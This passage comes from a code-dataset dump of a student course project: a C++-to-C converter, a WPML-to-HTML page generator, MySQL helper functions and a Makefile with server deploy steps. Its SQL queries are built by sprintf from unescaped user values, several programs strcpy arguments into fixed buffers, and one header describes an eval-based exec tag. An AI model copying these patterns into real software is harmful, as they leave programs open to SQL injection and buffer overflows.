2)\n\t{\n\t\tprintf(\"No file name given.\\n\");\n\t\treturn 0;\n\t}\n\t\n\trun(argv[1]);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6465898752212524, "alphanum_fraction": 0.6660761833190918, "avg_line_length": 14.68055534362793, "blob_id": "54036f0337d2c67798cc031558d974ed89d2b6f3", "content_id": "9b906c69c14ae3c71e6e7f05c445f7c042825b4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 70, "num_lines": 72, "path": "/driver.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the run() method, and a simple printing function\n *\tfor vectors.\n */\n#include\"vector.h\"\n#include\"parseFile.h\"\n#include\"classToStruct.h\"\n#include\"recognize.h\"\n#include\"driver.h\"\n#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n\n\nvoid printVector(Vector* v, FILE* out)\n{\n\tint i;\n\n\tfor(i = 0; i < v->length; i++)\n\t{\n\t\tfprintf(out, \"%s\", (char*)v->contents[i]);\n\t}\n}\n\nint run(char* fname)\n{\n\tchar outfname[512];\n\n\tFILE* out;\n\tVector* tokens;\n\n\tstrcpy(outfname, fname);\n\toutfname[strlen(outfname) - 1] = '\\0';\n\n\tout = fopen(outfname, \"w\");\n\tif(out == NULL)\n\t{\n\t\tprintf(\"Error in opening output file %s\\n\", outfname);\n\t\treturn 1;\n\t}\n\n\ttokens = getTokens(fname);\n\tif(tokens == NULL)\n\t{\n\t\tprintf(\"File was invalid, could not read.\");\n\t\tfclose(out);\n\t\treturn 1;\n\t}\n\n\tmangleAllMembers(tokens);\n\taddSelfReferences(tokens);\n\tplaceConstructors(tokens);\n\n\tfixOuterFunctions(tokens);\n\tmigrateFunctions(tokens);\n\tcreateAllConstructors(tokens);\n\n\treplaceClass(tokens);\n\n\tprintVector(tokens, out);\n\tdestroyVector(tokens);\n\n\tfclose(out);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6691588759422302, "alphanum_fraction": 0.6897196173667908, "avg_line_length": 25.75, "blob_id": "c27bfffbd938a12eae941a35bf3437e1a97f117e", "content_id": "beaa87dd8dc1aef6c0198ccfb67fe7077f82683e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 3210, "license_type": "no_license", "max_line_length": 89, "num_lines": 120, "path": "/Makefile", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "CC\t\t=gcc\nCCON\t=./a1\nCFLAGS\t=-ansi -Wall -g\nTFLAGS\t=-Wall -pedantic -Wextra -Werror -ansi -g\nCOBJECTS=driver.o classToStruct.o parseFile.o recognize.o vector.o\nOBJECTS\t=stream.o post.o tags.o generation.o dbutils.o\nEXEC1 \t=post\nEXEC2\t=addauthor\nEXEC3\t=create\nEXEC4\t=db\nINCLUDE\t=./\nLINK\t=-lstream\nMYSQL\t=-lmysqlclient -L/usr/lib/x86_64-linux-gnu\nLPATH\t=./\n\n\n#\n# This specifies which rules take no parameters.\n#\n.PHONY: all clean clobber\n\nall: build\n\n#\n# This is the normal compilation rule. Simply typing 'make' will run this\n#\nbuild: cconverter post libstream.a addAuthor view.py create database\n\n#\n# Large-scale macros\n#\n\naddAuthor: libstream.a addAuthor.c\n\t$(CC) $(CFLAGS) -o $(EXEC2) addAuthor.c -I$(INCLUDE) -L$(LPATH) $(LINK) $(MYSQL)\n\nlibstream.a: stream.o\n\tar cr libstream.a stream.o #$(MYSQL)\n\ncconverter: $(COBJECTS)\n\t$(CC) $(CFLAGS) -o a1 main.c $(COBJECTS) -I$(INCLUDE)\n\npost: libstream.a post.o\n\t$(CC) $(CFLAGS) -o post post.o -L$(LPATH) $(LINK) $(MYSQL)\n\ncreate:\ttags.o generation.o\n\t$(CC) $(CFLAGS) -o create create.c tags.o generation.o -I$(INCLUDE)\n\nview.py:\n\tchmod +x ./view.py\n\ndatabase: dbutils.o\n\t$(CC) $(CFLAGS) -o db db.c dbutils.o -I$(INCLUDE) $(MYSQL)\n\n#\n# Object rules:\n#\n\ndriver.o: driver.c\n\t$(CC) $(CFLAGS) -o ./driver.o driver.c -c -I$(INCLUDE)\n\nclassToStruct.o: classToStruct.c\n\t$(CC) $(CFLAGS) -o ./classToStruct.o classToStruct.c -c -I$(INCLUDE)\n\nvector.o: vector.c\n\t$(CC) $(CFLAGS) -o ./vector.o vector.c -c -I$(INCLUDE)\n\nparseFile.o: parseFile.c\n\t$(CC) $(CFLAGS) -o ./parseFile.o parseFile.c -c -I$(INCLUDE)\n\nrecognize.o: recognize.c\n\t$(CC) $(CFLAGS) -o ./recognize.o recognize.c -c -I$(INCLUDE)\n\nstream.o: stream.c\n\t$(CC) $(CFLAGS) -c stream.c -I$(INCLUDE) $(MYSQL)\n\npost.o: precompile\n\t$(CC) $(CFLAGS) post.c -c -I$(INCLUDE) -L$(LPATH) $(LINK)\n\ntags.o: tags.c tags.h\n\t$(CC) $(CFLAGS) tags.c -c -I$(INCLUDE)\n\ngeneration.o: generation.c generation.h\n\t$(CC) $(CFLAGS) generation.c -c -I$(INCLUDE)\n\ndbutils.o: dbutils.c dbutils.h\n\t$(CC) $(CFLAGS) dbutils.c -c -I$(INCLUDE)\n\n#\n#\tc++ conversion rule\n#\nprecompile: $(COBJECTS) post.cc\n\t$(CCON) post.cc\n\n#\n# Clean-up rules. Removes the executable and objects.\n#\n\ndeploy:\n\tscp -r *.c [email protected]:/srv/www/gsoverni\n\tscp -r *.h [email protected]:/srv/www/gsoverni\n\tscp -r *.cc [email protected]:/srv/www/gsoverni\n\tscp -r *.py [email protected]:/srv/www/gsoverni\n\tscp -r *.css [email protected]:/srv/www/gsoverni\n\t#scp -r *.jpg [email protected]:/srv/www/gsoverni\n\tscp -r Makefile [email protected]:/srv/www/gsoverni\n\tscp -r *.wpml [email protected]:/srv/www/gsoverni\n\tscp -r *.html [email protected]:/srv/www/gsoverni\n\tscp -r readme.txt [email protected]:/srv/www/gsoverni\n\tscp -r *.php [email protected]:/srv/www/gsoverni\n\tscp -r *.txt [email protected]:/srv/www/gsoverni\n\tssh [email protected] \"cd /srv/www/gsoverni && mkdir -p ./bin && make\"\n\nclose:\n\tcp * /var/www/html/gsoverni\n\nclean:\n\trm $(EXEC1) $(EXEC2) $(EXEC3) $(EXEC$) $(CCON) \n\nclobber:\n\trm $(EXEC1) $(EXEC2) $(EXEC3) $(EXEC4) $(CCON) $(COBJECTS) $(OBJECTS) libstream.a post.c\n" }, { "alpha_fraction": 0.6326530575752258, "alphanum_fraction": 0.6494597792625427, "avg_line_length": 20.921052932739258, "blob_id": "cbedd77351abe97f5ccf46d183265de83e12638a", "content_id": "a14a990f1aeca24fa2f719daa60e97fcb80be18e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 833, "license_type": "no_license", "max_line_length": 70, "num_lines": 38, "path": "/driver.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the run() method, and a simple printing function\n *\tfor vectors.\n */\n#ifndef __GSOVERNIGO_DRIVER_H__\n#define __GSOVERNIGO_DRIVER_H__\n\n#include\"vector.h\"\n#include<stdio.h>\n\n/**\n *\tprintVector\n *\tprints a vector as a string vector, with no separation.\n *\tIN:\t\t\tv\t\t\t- the vector to be printed.\n *\t\t\t\tout\t\t\t- a file pointer to the required output.\n *\tOUT:\t\tvoid\n *\tPOST:\t\tv has been printed to stdout\n *\tERROR:\t\tv is null.\n */\nvoid printVector(Vector* v, FILE* out);\n\n/**\n *\trun\n *\truns the main program. calls the functions in order.\n *\tIN:\t\t\tfname\t\t- the file name we are going to read\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\t<fname>.c has been created and written to.\n *\tERROR:\t\tfname points to an invalid file path.\n */\nint run(char* fname);\n\n#endif\n" }, { "alpha_fraction": 0.6660401225090027, "alphanum_fraction": 0.6741854548454285, "avg_line_length": 24.33333396911621, "blob_id": "dd6eda184da216411bc397bc4a22f8a58545831f", "content_id": "aa9e751a8f6ab4be201f9e1b07624502b1dee745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1596, "license_type": "no_license", "max_line_length": 69, "num_lines": 63, "path": "/generation.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains source for an html generator. \n */\n#ifndef __GSOVERNIGO_GENERATION_H__\n#define __GSOVERNIGO_GENERATION_H__\n\n/**\n *\tgeneratePage\n *\tgenerates a full page, given a file name\n *\tIN:\t\t\tfname\t\t\t- the file name we will be reading.\n *\tOUT:\t\tvoid\n *\tPOST:\t\ta whole php/html page will be printed to the page.\n *\tERROR:\t\tfname does not point to a valid file.\n */\nvoid generatePage(char* fname);\n\n/**\n *\tgenerateTag\n *\tgenerates a tag that is described by configtag.\n *\tIN:\t\t\tconfigTag\t\t- a wpml tag that needs to be turned into html\n *\tOUT:\t\tproduces an html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tconfigtag is null.\n */\nchar* generateTag(char* configTag);\n\n/**\n *\tgetValue\n *\tgets a value from an attribute that is used to create an html tag.\n *\tIN:\t\t\tattribute\t\t- an attribute that is like: value=\"<value\"\n *\tOUT:\t\treturns a malloced version of the attribute's value.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc failes, attribute is null.\n */\nchar* getValue(char* attribute);\n\n/**\n *\tsplitTagLine\n *\tsplits a wpml tag line by the period delimiters.\n *\tIN:\t\t\ttagLine\t\t\t- the period separated tag line.\n *\tOUT:\t\ta string array that contains the tags for this line.\n *\tPOST:\t\tnone\n *\tERROR:\t\ttagline is null, malloc fails.\n */\nchar** splitTagLine(char* tagLine);\n\n/**\n *\tgetArgs\n *\tgets the args from an attribute tag.\n *\tIN:\t\t\twholetag\t\t- a whole tag, with attributes inside.\n *\tOUT:\t\tproduces a string array of all attributes.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc failes, and wholetag is null.\n */\nchar** getArgs(char* wholeTag);\n\n#endif\n" }, { "alpha_fraction": 0.5672215223312378, "alphanum_fraction": 0.6094750165939331, "avg_line_length": 13.199999809265137, "blob_id": "daa130a77258ba6c5840483eeee60fb46ca158ba", "content_id": "f896c3481301ea1ddf011e7dfc501b7e1f986759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 781, "license_type": "no_license", "max_line_length": 80, "num_lines": 55, "path": "/addAuthor.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains the main function for the addauthor program.\n *\tUtilizes stream.h to update stream files located in messages/\n */\n#include \"stream.h\"\n#include <string.h>\n#include <stdlib.h>\n#include <stdio.h>\n\nint main(int argc, char** argv)\n{\n\tint remove;\n\tchar list[1024];\n\tchar userName[512];\n\n\t/* checks the number of args present, makes sure we actually get a file name */\n\tif(argc < 3)\n\t{\n\t\treturn 1;\n\t}\n\n\tremove = 0;\n\n\tstrcpy(userName, argv[1]);\n\tif(strcmp(argv[2], \"-r\") == 0)\n\t{\n\t\treturn 1;\n\t}\n\tstrcpy(list, argv[2]);\n\n\tif(argc > 3)\n\t{\n\t\tif(strcmp(argv[3], \"-r\") == 0)\n\t\t{\n\t\t\tremove = 1;\n\t\t}\n\t}\n\n\tif(!remove)\n\t{\n\t\taddUser(userName, list);\n\t}\n\telse\n\t{\n\t\tremoveUser(userName, list);\n\t}\n\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6777983903884888, "alphanum_fraction": 0.6876932382583618, "avg_line_length": 30.705883026123047, "blob_id": "ee6a8c1f42d4b47ac0c36432532c95b92ec9287b", "content_id": "efa1b8582234414c470ab8f3232f7643556e5422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1617, "license_type": "no_license", "max_line_length": 81, "num_lines": 51, "path": "/parseFile.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tThis file contains several methods for parsing a file into tokens\n * \tthat, if printed again in that order, will constitute a working cpp\n * \tprogram.\n */\n#ifndef __GSOVERNIGO_PARSEFILE_H__\n#define __GSOVERNIGO_PARSEFILE_H__\n\n#include\"vector.h\"\n\n/**\n * getTokens\n * gets the tokens (program independent terms) from the passed in cc file, and\n * organizes them into a vector struct.\n * IN:\t\t\tfname\t\t\t- the name of the file that will be tokenized.\n * OUT:\t\ttokens\t\t\t- the token vector that was derived from the file.\n * POST:\t\ta vector has been passed back, full of malloced strings.\n * ERROR:\t\tfname is an invalid file (null returned)\n */\nVector* getTokens(char* fname);\n\n/**\n * \tappendString\n *\ttakes string and the strlen of that string, and mallocs a new string, also\n *\tappending it to the end of vector v.\n *\tIN:\t\t\tv\t\t\t\t- the vector to be appended to.\n *\t\t\t\tstring\t\t\t- the string that will be malloced and appeneded\n *\t\t\t\ti\t\t\t\t- the strlen of the string that was passed in.\n *\tOUT:\t\t-1 on error, 0 on success, 1 on non-populated string\n *\tPOST:\t\tstring has been copied into v.\n *\tERROR:\t\tif malloc fails, or any passed in arguments are null/invalid\n */\nint appendString(Vector* v, char* string, int i);\n\n/**\n *\tprintProgram\n *\tprints the program out, in a formatted way. (traditional brackets and tabbing)\n *\tIN:\t\t\ttokens\t\t\t- a vector of the tokens that are to be printed.\n *\tOUT:\t\tvoid; no output produced.\n *\tPOST:\t\ttokens has been printed to the screen/file\n *\tERROR:\t\ttokens in null.\n */\nvoid printProgram(Vector* tokens);\n\n#endif\n" }, { "alpha_fraction": 0.6487570405006409, "alphanum_fraction": 0.6487570405006409, "avg_line_length": 23.129032135009766, "blob_id": "8b267da344e3527ce7850cf3fe090bd98ec2eb77", "content_id": "4765656fdbbe81148b3ccb9677c0fdcb10509d6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3741, "license_type": "no_license", "max_line_length": 82, "num_lines": 155, "path": "/tags.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#ifndef __GSOVERNIGO_TAGS_H__\n#define __GSOVERNIGO_TAGS_H__\n\n#define START_TAGS \"<html><body>\"\n#define END_TAGS \"</body></html>\"\n#define LINE_BREAK \"<br>\"\n\n/**\n *\tcreateText\n *\tcreates a text html tag from the passed in wpml tag.\n *\tIN:\t\t\ttextTag\t\t\t- the text tag that we will be reading\n *\tOUT:\t\ta new html-stable text tag (no <p> tags surrounding)\n *\tPOST:\t\tnone\n *\tERROR:\t\ttextTag is NULL.\n */\nchar* createText(char* textTag);\n\n/**\n *\tcreateHeader\n *\tcreates a header tag from the passed in wpml tag.\n *\tIN:\t\t\theadTag\t\t\t- the wpml header tag\n *\tOUT:\t\ta new html header tag <hn> formatted.\n *\tPOST:\t\tnone\n *\tERROR:\t\theadTag is NULL.\n */\nchar* createHeader(char* headTag);\n\n/**\n *\tcreateLink\n *\tcreates an <a href> tag from a wpml tag.\n *\tIN:\t\t\ta .l wpml tag.\n *\tOUT:\t\tan <a href> html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tlinktag is NULL\n */\nchar* createLink(char* linkTag);\n\n/**\n *\tcreateButton\n *\tcreates a button tag-and-form in html\n *\tIN:\t\t\tbuttonTag \t\t- the button wpml tag.\n *\tOUT:\t\tan html button and form tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tbuttontag is null.\n */\nchar* createButton(char* buttonTag);\n\n/**\n *\tcreateInput\n *\tcreates an text input tag-and-form\n *\tIN:\t\t\tinputTag\t\t- the input wpml tag\n *\tOUT:\t\tan html output tag\n *\tPOST:\t\tnone\n *\tERROR:\t\tinputTag is NULL\n */\nchar* createInput(char* inputTag);\n\n/**\n *\tcreateRadio\n *\tcreates an html radio button from a wpml config tag\n *\tIN:\t\t\tradiotag\t\t- the radio wpml tag\n *\tOUT:\t\ta new radio button html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tradiotag is null\n */\nchar* createRadio(char* radioTag);\n\n/**\n *\tcreatePicture\n *\tcreates a picture html tag (actually <img>)\n *\tIN:\t\t\tpictureTag\t\t- the picture wpml tag.\n *\tOUT:\t\ta new picture (img) html tag\n *\tPOST:\t\tnone\n *\tERROR:\t\tpicturetag is null.\n */\nchar* createPicture(char* pictureTag);\n\n/**\n *\tcreateExec\n *\tcreates an executable tag, which when eval()'d by php can execute a \n *\tprogram.\n *\tIN:\t\t\texecTag\t\t\t- a new executable tag.\n *\tOUT:\t\ta new executable tag that allows you to server-execute\n *\t\t\t\t... something.\n *\tPOST:\t\tnone\n *\tERROR:\t\texectag is NULL.\n */\nchar* createExec(char* execTag);\n\n\n/*-------------------------- start of user-made tags ---------------------------*/\n\n/**\n *\tcreateDiv\n *\tcreates a div (opening) tag.\n *\tIN:\t\t\tdivTag\t\t\t- a wpml f tag\n *\tOUT:\t\tproduces a div tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tdivTag is null\n */\nchar* createDiv(char* divTag);\n\n/**\n *\tcreateSelector\n *\tcreates a selector tag that has all the possible streams in the messages\n *\tfolder.\n *\tIN:\t\t\tselTag\t\t\t- the selector tag (wpml .s())\n *\tOUT:\t\ta selector html tag with all the options\n *\tPOST:\t\tnone\n *\tERROR:\t\tseltag is null.\n */\nchar* createSelector(char* selTag);\n\n/**\n *\tcreateDependency\n *\tcreates a hidden input field that allows thr propogation of values between\n *\tseveral pages without re-submission of the form or page.\n *\tIN:\t\t\tdepTag\t\t\t- a wpml dependency tag\n *\tOUT:\t\ta new dependency tag which can produce a hidden field\n *\tPOST:\t\tnone\n *\tERROR:\t\tdepTag is NULL.\n */\nchar* createDependency(char* depTag);\n\n/**\n *\tcreateAdd\n *\tcreates php that produces an addauthor component.\n *\tIN:\t\t\taddTag\t\t\t- the wpml .a() tag.\n *\tOUT:\t\ta php script that can produce an addauthor component\n *\tPOST:\t\tnone\n *\tERROR:\t\tnone\n */\nchar* createAdd(char* addTag);\n\n/**\n *\tcreateView\n *\tcreates a php script that generates a view interface.\n *\tIN:\t\t\ta .v() tag.\n *\tOUT:\t\ta new php script that creates a view interface.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc fails, otherwise none.\n */\nchar* createView(char* viewTag);\n\n/**\n *\tcreatePost\n *\tcreates a php script that generates a view tag.\n *\tIN:\t\t\tpostTag\t\t\t- a .p() tag.\n *\tOUT:\t\ta php script that generates a post interface.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc fails.\n */\nchar* createPost(char* postTag);\n\n#endif\n" }, { "alpha_fraction": 0.6277915835380554, "alphanum_fraction": 0.6501240730285645, "avg_line_length": 15.119999885559082, "blob_id": "fa204158c6df89705e7d4852e4f85828ed94a837", "content_id": "c98f1fc8da32219cd537be61d34838d68a834ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 133, "num_lines": 25, "path": "/create.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "#include \"generation.h\"\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define ERROR_NO_ARGS \"<html><body><h1>Whoops!<br><h3>Something went wrong.<br>No page name was given to be generated!</body></html>\"\n\nint main(int argc, char** argv)\n{\n\tchar fname[512];\n\n\tif(argc < 2)\n\t{\n\t\tputs(ERROR_NO_ARGS);\n\t\treturn -1;\n\t}\n\telse\n\t{\n\t\tstrcpy(fname, argv[1]);\n\t}\n\n\tgeneratePage(fname);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6271186470985413, "alphanum_fraction": 0.642906904220581, "avg_line_length": 16.720165252685547, "blob_id": "3d2a605d95d81506bb3f090f58a0a64e2653409b", "content_id": "83b337493c6d7ccfde7373cd5536fa8185052163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4307, "license_type": "no_license", "max_line_length": 130, "num_lines": 243, "path": "/dbutils.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"dbutils.h\"\n#include \"vector.h\"\n\n#include <mysql/mysql.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n\nint mysql_startConnect(MYSQL* sql)\n{\n\tmysql_init(sql);\n\n\tmysql_options(sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n\nint mysql_make(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"create table users (username varchar(64), stream varchar(32), lastread integer(5))\");\n\tresult += mysql_query(sql, \"create table streams (stream varchar(32))\");\n\tresult += mysql_query(sql, \"create table posts (stream varchar(32), username varchar(64), pdate char(14), post varchar(10000))\");\n\n\treturn result;\n}\n\n\nint mysql_clear(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"truncate table users\");\n\tresult += mysql_query(sql, \"truncate table posts\");\n\tresult += mysql_query(sql, \"truncate table streams\");\n\n\treturn result;\n}\n\nint mysql_reset(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"drop table users\");\n\tresult += mysql_query(sql, \"drop table posts\");\n\tresult += mysql_query(sql, \"drop table streams\");\n\n\treturn result;\n}\n\nint mysql_posts(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select post from posts order by pdate\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\nint mysql_users(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select distinct username from users\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\nint mysql_streams(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select distinct stream from users\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\n/*-----------------------------------------------------------------------*/\n\nint getLastRead(char* username, char* stream, MYSQL* sql)\n{\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tquery[0] = '\\0';\n\n\tsprintf(query, \"select lastRead from users where username='%s' and stream='%s'\", username, stream);\n\tmysql_query(sql, query);\n\n\tresult = mysql_store_result(sql);\n\t\n\trow = mysql_fetch_row(result);\n\n\treturn atoi(row[0]);\n}\n\nint setLastRead(char* username, char* stream, int n, MYSQL* sql)\n{\n\tint lastRead;\n\tchar query[256];\n\n\tlastRead = getLastRead(username, stream, sql);\n\tif(n <= lastRead)\n\t{\n\t\treturn 1;\n\t}\n\n\tsprintf(query, \"update users set lastread='%d' where users.stream='%s' and users.username='%s'\", n, stream, username);\n\n\tmysql_query(sql, query);\n\t\n\treturn 0;\n}\n\nint numposts(char* stream, MYSQL* sql)\n{\n\tchar query[256];\n\tMYSQL_RES* result;\n\n\tif(strcmp(stream, \"all\") == 0)\n\t{\n\t\tsprintf(query, \"select * from posts\");\n\t}\n\telse\n\t{\n\t\tsprintf(query, \"select * from posts where stream='%s'\", stream);\n\t}\n\n\tmysql_query(sql, query);\n\tresult = mysql_store_result(sql);\n\n\treturn mysql_num_rows(result);\n}\n\nint getPostN(char* username, char* stream, char* order, int n, MYSQL* sql)\n{\n\tint i;\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tquery[0] = '\\0';\n\n\tif(strcmp(stream, \"all\") == 0)\n\t{\n\t\tsprintf(query, \"select post from posts order by %s\", order);\n\t\tmysql_query(sql, query);\n\t}\n\telse\n\t{\n\t\tsprintf(query, \"select post from posts where stream='%s' order by %s\", stream, order);\n\t\tmysql_query(sql, query);\n\t}\n\n\tresult = mysql_store_result(sql);\n\n\tfor(i = 0; i < n; i++)\n\t{\n\t\trow = mysql_fetch_row(result);\n\t}\n\n\trow = mysql_fetch_row(result);\n\n\t/* this is the correct row, and also the post segment. */\n\tputs(row[0]);\n\tif(strcmp(stream, \"all\") != 0)\n\t{\n\t\tsetLastRead(username, stream, n, sql);\n\t}\n\n\treturn 0;\n}\n\nint getStreams(char* username, MYSQL* sql)\n{\n\tchar allStreams[512];\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tallStreams[0] = '\\0';\n\n\tsprintf(query, \"select distinct stream from users\");\n\n\tmysql_query(sql, query);\n\n\tresult = mysql_store_result(sql);\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tstrcat(allStreams, row[0]);\n\t\tstrcat(allStreams, \",\");\n\t}\n\tallStreams[strlen(allStreams) - 1] = '\\0';\n\n\tputs(allStreams);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5616438388824463, "alphanum_fraction": 0.5821917653083801, "avg_line_length": 15.941176414489746, "blob_id": "ffd879ddfe18c9e499b4b7119fe4f79964e2223e", "content_id": "4891a2c776596768715fe2acbd7312b156035010", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 59, "num_lines": 17, "path": "/view.py", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport sys\nfrom sys import *\nimport os\nfrom subprocess import call\n\n\nif __name__ == \"__main__\":\n\n username = argv[1]\n stream = argv[2]\n index = argv[3]\n order = argv[4]\n command = argv[5]\n \n call([\"./db\", command, username, stream, index, order]) \n" }, { "alpha_fraction": 0.6909794211387634, "alphanum_fraction": 0.6936041116714478, "avg_line_length": 34.485294342041016, "blob_id": "ebe2afad279454e54c3a2cfad4e5cf4ea0f220c0", "content_id": "5f8f76fce64a3155c92a5b1eced3450120bd2c7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7239, "license_type": "no_license", "max_line_length": 94, "num_lines": 204, "path": "/classToStruct.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains functions that are designed to operate on class-to-\n *\tstruct situations in a cc file, where the desided outcome is to produce\n *\ta working c file.\n *\n *\tThese functions aid in that transition.\n */\n#ifndef __GSOVERNIGO_CLASSTOSTRUCT_H__\n#define __GSOVERNIGO_CLASSTOSTRUCT_H__\n\n#include\"vector.h\"\n\n/**\n *\tmangle\n *\tthis function mangles the names of functions, so that they can be used as\n *\tfunction pointers in a struct.\n *\tIN:\t\t\tclassName\t\t\t- the name of the class that contains the\n *\t\t\t\t\t\t\t\t\t member functionName function.\n *\t\t\t\tfunctionName\t\t- the name of the function to be mangled.\n *\t\t\t\t\t\t\t\t\t the function name should not contain\n *\t\t\t\t\t\t\t\t\t the return type.\n *\t\t\t\targs\t\t\t\t- the args string, which contains all the\n *\t\t\t\t\t\t\t\t\t args terms.\n *\tOUT:\t\ta mangled, malloced name that can be used as a new function\n *\t\t\t\tpointer name. The new name shall conform to:\n *\n *\t\t\t\tclass math\n *\t\t\t\t{\n *\t\t\t\t\tint add(int a, int b)\n *\t\t\t\t\t{\n *\t\t\t\t\t\treturn a + b;\n *\t\t\t\t\t}\n *\t\t\t\t}\n *\n *\t\t\t\tbecomes:\n *\n *\t\t\t\tstruct math\n *\t\t\t\t{\n *\t\t\t\t\tint (*mathaddii)(int a, int b);\n *\t\t\t\t}\n *\n *\t\t\t\tint mathaddii(int a, int b)\n *\t\t\t\t{\n *\t\t\t\t\treturn a + b;\n *\t\t\t\t}\n *\tPOST:\t\ta new malloced name has been returned, ensure it is freed.\n *\tERROR:\t\tif malloc fails, or either of the two strings passed in are null\n */\nchar* mangle(char* className, char* functionName, char* args);\n\n/**\n * \treplaceClass\n * \treplaces the word class in the program with struct.\n * \tIN:\t\t\tprogram\t\t\t- the program struct that we will be modifying.\n * \tOUT:\t\tnumReplaced\t\t- the number of items we replaced in the program\n * \tPOST:\t\tall instances of the string \"class\" will be replaced by \"struct\"\n * \tERROR:\t\tif program is null, -1 will be returned for numReplaced.\n */\nint replaceClass(Vector* tokens);\n\n/**\n * \taddSelfReferences\n * \tadds a \"this->\" pointer to all class members that are located in the member\n * \tfunctions in the program.\n * \tIN:\t\t\ttokens\t\t\t- the tokens vector that holds the program\n * \tOUT:\t\tthe number of \"this->\" pointers entered into the program\n *\tPOST:\t\tthis-> has been added to class variables in member functions.\n *\tERROR:\t\ttokens is null\n */\nint addSelfReferences(Vector* 